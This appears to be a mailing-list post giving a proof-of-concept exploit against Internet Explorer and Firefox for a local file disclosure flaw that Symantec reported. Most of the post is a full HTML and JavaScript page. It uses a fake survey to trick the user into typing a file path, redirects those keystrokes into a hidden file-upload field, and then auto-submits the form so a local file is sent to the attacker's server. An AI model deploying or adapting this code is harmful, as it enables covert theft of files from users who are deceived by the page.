[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)



This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.

The subjects of the links sugested, are for forcing the user to input:
FILE
AUTOEXEC
BAT

so we can receive:
file://c:/autoexec.bat

and upload this file to a server.

This is a low risk vulnerability.

//--START HTML CODE--//
<html>
<body>
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
*  OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
*		by sirdarckcat [at] gmail [.] com
*                   from: 	elhacker.net
**/
var nidshift = new Array(0 ,0 ,0 ,0 ,1  ,0  ,0  ,0 ,1  ,0  ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0  ,0 ,0 ,0);
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84);
var thefilew = "file://c:/autoexec.bat";
var dv = 0;
var chift = false;
var teo = document.forms[0].thet;
var feo = document.forms[0].other;

function checa(tecla) {
		var rt=(tecla.which)?tecla.which:event.keyCode;
		var lw=String.fromCharCode(rt);
		if (dv>=thefilew.length){
			document.forms[0].submit();
		}
		if (rt == 16){
			chift = true;
		}
		if (rt==thefilek[dv]){
			if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
				teo.disabled=false;
				teo.style.visibility="visible";
				teo.focus();
				feo.value += thefilew[dv];
				dv++;
			}
		}else{
			feo.focus();
			teo.disabled=true;
			teo.style.visibility="hidden";
		}
}
function solsh(tecla){
	var rt=(tecla.which)?tecla.which:event.keyCode;
	if (rt == 16){
		chift = false;
	}
}
function mprss(tecla){
	var rt=(tecla.which)?tecla.which:event.keyCode;
	if (rt == 16){
		chift = true;
	}
}
document.onkeydown = checa;
document.onkeyup   = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//

Att.
Sirdarckcat
www.elhacker.net